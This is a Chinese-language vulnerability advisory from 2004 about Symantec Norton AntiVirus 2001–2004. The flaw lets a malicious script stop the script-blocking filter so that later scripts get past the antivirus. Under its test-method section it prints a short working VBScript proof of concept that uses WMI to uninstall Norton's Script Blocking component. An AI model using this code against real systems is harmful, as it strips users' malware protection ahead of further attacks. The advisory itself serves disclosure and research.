发布日期：2004-07-16
更新日期：2004-07-26

受影响系统：

Symantec Norton AntiVirus 2004
Symantec Norton AntiVirus 2003
Symantec Norton AntiVirus 2002
Symantec Norton AntiVirus 2001
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional

描述：

---

BUGTRAQ  ID: 10739

Symantec Norton AntiVirus是一款功能强大的反病毒程序。

Symantec Norton AntiVirus脚本过滤器存在拒绝服务问题，远程攻击者可以利用这个漏洞借此可绕过脚本检查。

攻击者可以构建恶意脚本，诱使使用Symantec Norton Antivirus软件的用户解析，可导致此解析器停止工作，而本身NORTON其他功能正常，因此攻击者可以再次使用其他恶意脚本，绕过防病毒系统。

<*来源：vozzie （vozzie@gmail.com）
  
  链接：http://www.securityfocus.com/archive/82/369077/2004-07-13/2004-07-19/0
        http://www.securityfocus.com/archive/82/369079/2004-07-13/2004-07-19/0
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

vozzie （vozzie@gmail.com）提供了如下测试方法：

' get wmi
set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
' enum soft
for each e in wmi.ExecQuery("Select * from Win32_Product")
on error resume next
' uninstall script blocker part of norton
if instr(e.name,"Script") and instr(e.name,"Block") then
e.UnInstall()
end if
next

' just do what you like
set fso = createobject("scripting.filesystemobject")
fso.createtextfile("c:\byenav.txt").write "=)"

建议：

---

厂商补丁：

Symantec
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.symantec.com/

浏览次数：3055
严重程度：1（网友投票）